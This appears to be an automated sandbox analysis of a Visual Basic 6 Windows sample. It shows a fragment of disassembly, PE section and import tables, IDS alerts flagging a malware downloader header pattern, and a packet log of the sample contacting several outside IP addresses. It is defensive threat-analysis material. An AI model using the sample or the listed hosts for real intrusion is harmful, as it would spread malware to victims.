                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    movsd
                                                                                                                                                                                                                                                    test byte ptr [eax], 00000019h
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax+00000000h], cl
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [edx], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [edi], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [ebp-4E810EB2h], al
                                                                                                                                                                                                                                                    pushfd
                                                                                                                                                                                                                                                    call far 1AF7h : C9C2984Bh
                                                                                                                                                                                                                                                    jo 00007FB43C4FA63Bh
                                                                                                                                                                                                                                                    cmp byte ptr [ecx], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax-58000000h], bl
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [ecx], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [ecx+ebp*4], bh
                                                                                                                                                                                                                                                    test byte ptr [eax], 00000001h
                                                                                                                                                                                                                                                    and byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax-5Bh], ah
                                                                                                                                                                                                                                                    test byte ptr [eax], 0000001Bh
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [ebp+45h], dh
                                                                                                                                                                                                                                                    js 00007FB43C4FA6E9h
                                                                                                                                                                                                                                                    popad
                                                                                                                                                                                                                                                    je 00007FB43C4FA6F5h
                                                                                                                                                                                                                                                    push 0040C100h
                                                                                                                                                                                                                                                    fadd st(0), st(0)
                                                                                                                                                                                                                                                    inc eax
                                                                                                                                                                                                                                                    add bl, bl
                                                                                                                                                                                                                                                    scasb
                                                                                                                                                                                                                                                    dec ecx
                                                                                                                                                                                                                                                    test dword ptr [ecx+ebx-3F56B459h], eax
                                                                                                                                                                                                                                                    mov bl, 8Fh
                                                                                                                                                                                                                                                    xor eax, 70C5231Dh
                                                                                                                                                                                                                                                    rol byte ptr [edi+edx*8-12h], cl
                                                                                                                                                                                                                                                    salc
                                                                                                                                                                                                                                                    dec edx
                                                                                                                                                                                                                                                    mov ah, 13h
                                                                                                                                                                                                                                                    in eax, dx
                                                                                                                                                                                                                                                    fsub qword ptr [edi]
                                                                                                                                                                                                                                                    push 31CCFF3Ch
                                                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x2ac840x28.text
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x2e0000x5e0.rsrc
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2500x20
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x10000x284.text
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                    .text0x10000x2a7280x2b0006805a78c569a1d85aabd684522fa4102False0.3680675417877907data5.947197438251493IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                    .data0x2c0000x1b740x1000620f0b67a91f7f74151bc5be745b7110False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                    .rsrc0x2e0000x5e00x10007eadf1dd3250382b6423bc57010e66beFalse0.630859375data6.236835270581233IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                    .tdata0x2f0000xf0000xf00084c48b8da7e9b9d3c5667ad9819debd9False0.0013346354166666667data0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                    RT_ICON0x2e2f80xcd0Device independent bitmap graphic, 32 x 64 x 24, image size 30720.6878048780487804
                                                                                                                                                                                                                                                    RT_GROUP_ICON0x2e2e40x14data1.15
                                                                                                                                                                                                                                                    RT_VERSION0x2e0f00x1f4dataEnglishUnited States0.504
                                                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                                                    MSVBVM60.DLLEVENT_SINK_GetIDsOfNames, __vbaStrI2, _CIcos, _adj_fptan, __vbaStrI4, __vbaVarVargNofree, __vbaFreeVar, __vbaStrVarMove, __vbaLenBstr, __vbaLateIdCall, __vbaPut3, __vbaEnd, __vbaFreeVarList, _adj_fdiv_m64, __vbaPut4, EVENT_SINK_Invoke, __vbaRaiseEvent, __vbaFreeObjList, __vbaStrErrVarCopy, _adj_fprem1, __vbaRecAnsiToUni, __vbaCopyBytes, __vbaStrCat, __vbaLsetFixstr, __vbaRecDestruct, __vbaSetSystemError, __vbaHresultCheckObj, __vbaNameFile, _adj_fdiv_m32, __vbaAryVar, Zombie_GetTypeInfo, __vbaAryDestruct, __vbaBoolStr, __vbaExitProc, __vbaI4Abs, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR4, __vbaStrFixstr, _CIsin, __vbaErase, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaGet3, __vbaStrCmp, __vbaGet4, __vbaPutOwner3, __vbaVarTstEq, __vbaAryConstruct2, __vbaObjVar, __vbaI2I4, DllFunctionCall, __vbaVarLateMemSt, __vbaFpUI1, __vbaRedimPreserve, __vbaStrR4, _adj_fpatan, __vbaFixstrConstruct, __vbaLateIdCallLd, Zombie_GetTypeInfoCount, __vbaRedim, __vbaRecUniToAnsi, EVENT_SINK_Release, __vbaNew, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaGetOwner3, __vbaUbound, __vbaFileSeek, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaVarLateMemCallLdRf, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarSetVar, __vbaI4Var, __vbaLateMemCall, __vbaVarAdd, __vbaAryLock, __vbaStrComp, __vbaVarDup, __vbaStrToAnsi, __vbaFpI2, __vbaFpI4, __vbaVarLateMemCallLd, __vbaVarSetObjAddref, __vbaRecDestructAnsi, __vbaLateMemCallLd, _CIatan, __vbaAryCopy, __vbaStrMove, __vbaCastObj, __vbaR8IntI4, _allmul, __vbaVarLateMemCallSt, _CItan, __vbaAryUnlock, _CIexp, __vbaFreeObj, __vbaFreeStr
                                                                                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                    EnglishUnited States
                                                                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                    2024-10-29T13:08:00.817344+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549705132.226.247.7380TCP
                                                                                                                                                                                                                                                    2024-10-29T13:08:02.910971+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549705132.226.247.7380TCP
                                                                                                                                                                                                                                                    2024-10-29T13:08:03.518436+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549708188.114.96.3443TCP
                                                                                                                                                                                                                                                    2024-10-29T13:08:04.656945+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549709132.226.247.7380TCP
                                                                                                                                                                                                                                                    2024-10-29T13:08:07.209909+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549713188.114.97.3443TCP
                                                                                                                                                                                                                                                    2024-10-29T13:08:08.838907+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549715188.114.97.3443TCP
                                                                                                                                                                                                                                                    2024-10-29T13:08:12.358955+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549721188.114.97.3443TCP
                                                                                                                                                                                                                                                    2024-10-29T13:08:14.572060+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549725188.114.97.3443TCP
                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                    Oct 29, 2024 13:07:54.801620960 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                    Oct 29, 2024 13:07:54.801649094 CET49674443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                    Oct 29, 2024 13:07:54.926595926 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                    Oct 29, 2024 13:07:59.176042080 CET4970480192.168.2.564.233.166.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:07:59.181468964 CET804970464.233.166.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:07:59.181556940 CET4970480192.168.2.564.233.166.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:07:59.188297987 CET4970480192.168.2.564.233.166.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:07:59.193715096 CET804970464.233.166.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:07:59.570375919 CET4970580192.168.2.5132.226.247.73
                                                                                                                                                                                                                                                    Oct 29, 2024 13:07:59.575797081 CET8049705132.226.247.73192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:07:59.575963974 CET4970580192.168.2.5132.226.247.73
                                                                                                                                                                                                                                                    Oct 29, 2024 13:07:59.576453924 CET4970580192.168.2.5132.226.247.73
                                                                                                                                                                                                                                                    Oct 29, 2024 13:07:59.581794024 CET8049705132.226.247.73192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:00.100457907 CET804970464.233.166.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:00.100480080 CET804970464.233.166.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:00.100579023 CET4970480192.168.2.564.233.166.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:00.101532936 CET4970480192.168.2.564.233.166.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:00.101532936 CET4970480192.168.2.564.233.166.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:00.451689005 CET8049705132.226.247.73192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:00.504200935 CET4970580192.168.2.5132.226.247.73
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:00.510262012 CET8049705132.226.247.73192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:00.769324064 CET8049705132.226.247.73192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:00.817343950 CET4970580192.168.2.5132.226.247.73
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:01.169035912 CET49706443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:01.169069052 CET44349706188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:01.169162989 CET49706443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:01.174484015 CET49706443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:01.174508095 CET44349706188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:02.065903902 CET44349706188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:02.066034079 CET49706443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:02.071641922 CET49706443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:02.071657896 CET44349706188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:02.071883917 CET44349706188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:02.131588936 CET49706443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:02.175338030 CET44349706188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:02.362365007 CET4970780192.168.2.5108.177.15.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:02.368449926 CET8049707108.177.15.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:02.368529081 CET4970780192.168.2.5108.177.15.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:02.368700027 CET4970780192.168.2.5108.177.15.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:02.374938965 CET8049707108.177.15.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:02.490402937 CET44349706188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:02.490463972 CET44349706188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:02.493186951 CET49706443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:02.496784925 CET49706443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:02.499444008 CET4970580192.168.2.5132.226.247.73
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:02.504888058 CET8049705132.226.247.73192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:02.763768911 CET8049705132.226.247.73192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:02.765647888 CET49708443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:02.765707970 CET44349708188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:02.765902996 CET49708443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:02.766233921 CET49708443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:02.766252041 CET44349708188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:02.910970926 CET4970580192.168.2.5132.226.247.73
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:03.290827036 CET8049707108.177.15.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:03.290849924 CET8049707108.177.15.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:03.291038990 CET4970780192.168.2.5108.177.15.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:03.292417049 CET4970780192.168.2.5108.177.15.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:03.292417049 CET4970780192.168.2.5108.177.15.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:03.374557972 CET44349708188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:03.379364014 CET49708443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:03.379443884 CET44349708188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:03.518412113 CET44349708188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:03.518481970 CET44349708188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:03.518574953 CET49708443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:03.575938940 CET49708443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:03.652029991 CET4970580192.168.2.5132.226.247.73
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:03.658257008 CET8049705132.226.247.73192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:03.660880089 CET4970580192.168.2.5132.226.247.73
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:03.778568983 CET4970980192.168.2.5132.226.247.73
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:03.784071922 CET8049709132.226.247.73192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:03.784179926 CET4970980192.168.2.5132.226.247.73
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:03.784301043 CET4970980192.168.2.5132.226.247.73
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:03.790875912 CET8049709132.226.247.73192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:04.410921097 CET49674443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:04.411248922 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:04.535953045 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:04.656728983 CET8049709132.226.247.73192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:04.656944990 CET4970980192.168.2.5132.226.247.73
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:04.662842989 CET8049709132.226.247.73192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:04.662904024 CET4970980192.168.2.5132.226.247.73
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:04.666565895 CET49710443192.168.2.5188.114.97.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:04.666599035 CET44349710188.114.97.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:04.666670084 CET49710443192.168.2.5188.114.97.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:04.666914940 CET49710443192.168.2.5188.114.97.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:04.666932106 CET44349710188.114.97.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:04.715926886 CET4971180192.168.2.5142.251.168.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:04.721369982 CET8049711142.251.168.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:04.721513987 CET4971180192.168.2.5142.251.168.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:04.721707106 CET4971180192.168.2.5142.251.168.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:04.728256941 CET8049711142.251.168.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:05.284919977 CET44349710188.114.97.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:05.286644936 CET49710443192.168.2.5188.114.97.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:05.286689997 CET44349710188.114.97.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:05.432358980 CET44349710188.114.97.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:05.432451963 CET44349710188.114.97.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:05.432513952 CET49710443192.168.2.5188.114.97.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:05.432908058 CET49710443192.168.2.5188.114.97.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:05.437011957 CET4971280192.168.2.5132.226.247.73
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:05.442548990 CET8049712132.226.247.73192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:05.442639112 CET4971280192.168.2.5132.226.247.73
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:05.442732096 CET4971280192.168.2.5132.226.247.73
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:05.448065996 CET8049712132.226.247.73192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:05.653434992 CET8049711142.251.168.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:05.653501987 CET8049711142.251.168.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:05.653532982 CET4971180192.168.2.5142.251.168.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:05.653567076 CET4971180192.168.2.5142.251.168.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:05.653999090 CET4971180192.168.2.5142.251.168.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:05.654026985 CET4971180192.168.2.5142.251.168.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:06.304658890 CET8049712132.226.247.73192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:06.308789015 CET4434970323.1.237.91192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:06.311011076 CET49703443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:06.331495047 CET49713443192.168.2.5188.114.97.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:06.331579924 CET44349713188.114.97.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:06.331688881 CET49713443192.168.2.5188.114.97.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:06.348450899 CET4971280192.168.2.5132.226.247.73
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:06.360547066 CET49713443192.168.2.5188.114.97.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:06.360589981 CET44349713188.114.97.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:07.051150084 CET44349713188.114.97.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:07.053086042 CET49713443192.168.2.5188.114.97.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:07.053164005 CET44349713188.114.97.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:07.209943056 CET44349713188.114.97.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:07.210014105 CET44349713188.114.97.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:07.210108042 CET49713443192.168.2.5188.114.97.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:07.210563898 CET49713443192.168.2.5188.114.97.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:07.215435982 CET4971280192.168.2.5132.226.247.73
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:07.216550112 CET4971480192.168.2.5132.226.247.73
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:07.221532106 CET8049712132.226.247.73192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:07.221652985 CET4971280192.168.2.5132.226.247.73
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:07.222032070 CET8049714132.226.247.73192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:07.222126961 CET4971480192.168.2.5132.226.247.73
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:07.222213984 CET4971480192.168.2.5132.226.247.73
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:07.227523088 CET8049714132.226.247.73192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.076831102 CET8049714132.226.247.73192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.080446959 CET49715443192.168.2.5188.114.97.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.080547094 CET44349715188.114.97.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.080648899 CET49715443192.168.2.5188.114.97.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.081084967 CET49715443192.168.2.5188.114.97.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.081124067 CET44349715188.114.97.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.129731894 CET4971480192.168.2.5132.226.247.73
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.695092916 CET44349715188.114.97.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.697523117 CET49715443192.168.2.5188.114.97.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.697561026 CET44349715188.114.97.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.777049065 CET4971680192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.782584906 CET804971651.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.782685041 CET4971680192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.783024073 CET4971680192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.788537025 CET804971651.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.838957071 CET44349715188.114.97.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.839039087 CET44349715188.114.97.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.839180946 CET49715443192.168.2.5188.114.97.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.840073109 CET49715443192.168.2.5188.114.97.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.845372915 CET4971480192.168.2.5132.226.247.73
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.846230030 CET4971780192.168.2.5132.226.247.73
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.851048946 CET8049714132.226.247.73192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.851125002 CET4971480192.168.2.5132.226.247.73
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.851597071 CET8049717132.226.247.73192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.851681948 CET4971780192.168.2.5132.226.247.73
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.851825953 CET4971780192.168.2.5132.226.247.73
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.857274055 CET8049717132.226.247.73192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:09.683345079 CET804971651.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:09.683454990 CET4971680192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:09.719826937 CET8049717132.226.247.73192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:09.721261024 CET49718443192.168.2.5188.114.97.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:09.721306086 CET44349718188.114.97.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:09.721458912 CET49718443192.168.2.5188.114.97.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:09.721750021 CET49718443192.168.2.5188.114.97.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:09.721764088 CET44349718188.114.97.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:09.770303011 CET4971780192.168.2.5132.226.247.73
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:10.068509102 CET49719443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:10.068561077 CET4434971951.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:10.068630934 CET49719443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:10.088011026 CET49719443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:10.088036060 CET4434971951.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:10.330498934 CET44349718188.114.97.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:10.338843107 CET49718443192.168.2.5188.114.97.3
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:10.338882923 CET44349718188.114.97.3192.168.2.5
